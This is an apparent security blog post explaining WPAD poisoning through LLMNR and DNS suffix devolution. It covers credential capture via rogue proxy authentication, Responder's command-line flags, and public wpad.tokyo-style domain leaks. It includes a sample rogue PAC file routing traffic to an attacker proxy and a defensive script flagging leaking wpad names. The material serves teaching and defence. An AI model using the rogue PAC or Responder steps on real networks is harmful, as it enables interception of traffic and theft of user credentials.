WPAD, or Web Proxy Auto-Discovery Protocol, is the mechanism used by Internet Explorer and any other Windows software that follows the system's Internet settings to discover proxy server settings automatically, so the machine can connect to the outside world, usually the Internet. The client locates a PAC (proxy auto-config) file, a small JavaScript script whose FindProxyForURL function tells the browser which proxy, if any, to use for each URL.
If an attacker resides in the victim's network, he can simply answer the LLMNR (or NetBIOS Name Service) query for the "wpad" name that the client falls back to when DNS fails, return a PAC file that points the browser at his own station, and from then on proxy the victim's web traffic: a full man-in-the-middle position for HTTP. (HTTPS requests are tunnelled through the proxy with CONNECT, so the attacker sees which hosts the victim talks to but not the plaintext unless the victim also accepts a forged certificate.)
Moreover, if the attacker's rogue proxy demands authentication, the victim hands over credentials. With HTTP Basic authentication the user is prompted and the username and password arrive at the attacker in cleartext (Base64 only). With NTLM, which Windows will often send silently because a single-label name like "wpad" falls into the Intranet zone, the attacker obtains a NetNTLM challenge-response hash that can be cracked offline or relayed.
All of this is automated by the well-known Responder tool, written by Laurent Gaffié at Trustwave SpiderLabs and now shipped with Kali Linux: running responder with -I (interface), -w (rogue WPAD server) and -F (force WPAD authentication) does the whole dance, and -b switches the challenge from NTLM to Basic authentication.
A full example can be seen here:
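To make concrete what the browser does with the PAC file it receives, here is an added example written for this page (it is neither Responder's own PAC nor the walkthrough linked above): a rogue PAC of the same shape, plus Node stand-ins for the helper functions browsers expose to PAC scripts, so the routing decision can be evaluated offline. The proxy address 10.0.0.66:3128 and the sample URLs are assumptions.

```javascript
// Added example: a minimal PAC file of the kind a rogue WPAD server hands out,
// plus Node-side stand-ins for the PAC helper functions so the policy can be
// evaluated offline. The proxy address is a constructed placeholder.
const ATTACKER_PROXY = "10.0.0.66:3128"; // assumption: the attacker's station

// Stand-ins for the helpers browsers provide to PAC scripts (not part of Node).
function isPlainHostName(host) { return !host.includes("."); }
function dnsDomainIs(host, domain) {
  return host.length >= domain.length && host.endsWith(domain);
}
function shExpMatch(str, pattern) {
  // Convert a shell-style glob (* and ?) into an anchored regular expression.
  const re = "^" + pattern.replace(/[.+^${}()|\[\]\\]/g, "\\$&")
                          .replace(/\*/g, ".*")
                          .replace(/\?/g, ".") + "$";
  return new RegExp(re).test(str);
}

// The PAC policy itself: local names go DIRECT, everything else goes through
// the attacker's proxy, with DIRECT as fallback so the victim never notices
// if the proxy is down.
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || shExpMatch(host, "localhost*") ||
      host === "127.0.0.1" || dnsDomainIs(host, ".local")) {
    return "DIRECT";
  }
  return "PROXY " + ATTACKER_PROXY + "; DIRECT";
}

// Evaluate the policy for a list of URLs, as the browser would.
function routeAll(urls) {
  return urls.map((u) => {
    const host = new URL(u).hostname;
    return { url: u, decision: FindProxyForURL(u, host) };
  });
}

// Constructed sample of the kind of requests a workstation makes.
const SAMPLE_URLS = [
  "http://intranet/portal",
  "http://fileserver.local/share",
  "http://www.example.com/login",
  "https://mail.example.com/owa",
];

for (const r of routeAll(SAMPLE_URLS)) {
  console.log(r.decision.padEnd(32), r.url);
}
```

The "; DIRECT" fallback is the detail worth noticing: if the rogue proxy disappears, browsing keeps working, so nothing on the victim's side looks broken. The local-name exceptions keep intranet traffic flowing normally for the same reason.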
But wait, the fun doesn't stop there. Before falling back to LLMNR, WPAD tries DNS: it looks up the "wpad" hostname with the machine's DNS suffixes appended and, through DNS suffix devolution, strips labels off the primary suffix and retries.
So if an organization called Contoso runs an Active Directory domain with a matching name, say corp.contoso.com, a workstation with WPAD enabled asks the DNS server for wpad.corp.contoso.com and then, after devolution, for wpad.contoso.com.
If one of those devolved names is resolvable on the public Internet, that is, its suffix ends in a real TLD and the organization does not actually own that zone, the query leaves the LAN and whoever registered the name answers it. The attack then becomes FAR more dangerous, because it no longer needs an attacker inside the network: it leaks from the LAN to the WAN.
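The following added example (mine, not from the original post or the Black Hat research) models the names a workstation tries while resolving "wpad" and flags which of them leave the organization's namespace. It generalizes the Contoso case: the domain corp.contoso.tokyo, the owned-zone list and the TLD list are constructed, and the devolution rule is simplified to "stop when fewer labels than the devolution level remain", which matches the documented default of level 2 stopping at the second-level domain.

```javascript
// Added example (not from the original post): model the names a Windows client
// queries while auto-discovering "wpad" and flag those that escape the LAN.
// The suffixes, zone list and TLD list below are constructed for illustration.

// Order of attempts: each entry of the DNS suffix search list, then the primary
// suffix devolved one label at a time. Windows stops devolving when fewer labels
// than the devolution level remain (level 2 stops at second-level domains);
// that is the simplified model used here.
function wpadCandidates(primarySuffix, searchList = [], devolutionLevel = 2) {
  const names = searchList.map((s) => `wpad.${s}`);
  const labels = primarySuffix.split(".").filter(Boolean);
  for (let i = 0; labels.length - i >= devolutionLevel; i++) {
    names.push(`wpad.${labels.slice(i).join(".")}`);
  }
  return [...new Set(names)];
}

function underZone(name, zone) {
  return name === zone || name.endsWith(`.${zone}`);
}

// A query leaks when its suffix is not under a zone the organization controls
// and its rightmost label is a public TLD, so the recursive resolver walks out
// to the Internet and whoever registered wpad.<suffix> gets to answer.
function classify(names, ownedZones, publicTlds) {
  return names.map((name) => {
    const owned = ownedZones.some((z) => underZone(name, z));
    const tld = name.slice(name.lastIndexOf(".") + 1);
    return { name, owned, leaksToInternet: !owned && publicTlds.has(tld) };
  });
}

// Constructed scenario: an AD domain corp.contoso.tokyo that the company never
// registered publicly, plus a legacy search-list entry it does control.
const PUBLIC_TLDS = new Set(["com", "tokyo", "news", "university"]); // subset
const OWNED_ZONES = ["contoso.local"];
const REPORT = classify(
  wpadCandidates("corp.contoso.tokyo", ["contoso.local"]),
  OWNED_ZONES,
  PUBLIC_TLDS
);

for (const r of REPORT) {
  console.log(r.leaksToInternet ? "LEAKS " : "ok    ", r.name);
}
```

Lowering the devolution level to 1 in the call above adds wpad.tokyo to the list, which is exactly the kind of name the Black Hat researcher registered. The practical check for a defender is to run this against every DNS suffix and search-list entry actually deployed by group policy and DHCP, and to register (or create an empty internal zone for) any wpad name that falls outside owned zones.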
During the last Black Hat Las Vegas conference a researcher actually registered the wpad hostname under multiple top-level domains, such as wpad.news, wpad.university and wpad.tokyo, hoping to receive requests from organizations whose internal names collide with those TLDs. Surprisingly (or not), he did. A LOT.
The most successful suffix was .tokyo, perhaps because of the upcoming Olympics that will take place in the city in 2020.
An article about this hack can be found here:
The presentation from BlackHat can be found here:
Have a great week!